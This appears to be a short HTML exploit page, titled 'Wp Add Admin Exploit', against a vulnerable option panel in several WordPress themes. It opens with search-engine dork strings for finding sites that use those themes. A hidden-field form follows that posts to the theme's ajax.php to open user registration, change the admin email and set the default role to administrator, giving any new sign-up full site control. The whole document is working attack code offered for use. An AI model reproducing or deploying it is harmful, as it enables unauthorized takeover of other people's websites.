<html>
<title> Wp Add Admin Exploit</title>
<!--
inurl:/wp-content/themes/mazine/
inurl:/wp-content/themes/Orchestra/
inurl:/wp-content/themes/shopsum/
inurl:/wp-content/themes/shotzz/
inurl:/wp-content/themes/test/
inurl:/wp-content/themes/Viteeo/
inurl:/wp-content/themes/vithy/
inurl:/wp-content/themes/yvora/
inurl:/wp-content/themes/sodales
-->
target: <input id="mytarget" onclick="myFunction()" value="http://targetweb/wp-content/themes/shotzz/hades_framework/option_panel/ajax.php">
<form id="myaction" action="" method="POST">
<script>
function myFunction() {
document.getElementById("myaction").action = document.getElementById("mytarget").value;
}
</script>
<input type="hidden" name="values[0][name]" value="users_can_register">
<input type="hidden" name="values[0][value]" value="1">
<input type="hidden" name="values[1][name]" value="admin_email">
email: <input name="values[1][value]" value="[email protected]"><br>
<input type="hidden" name="values[2][name]" value="default_role">
<input type="hidden" name="values[2][value]" value="administrator">
<input type="hidden" name="action" value="save">
<input type="submit" value="Submit">
</form>
</html>
Comments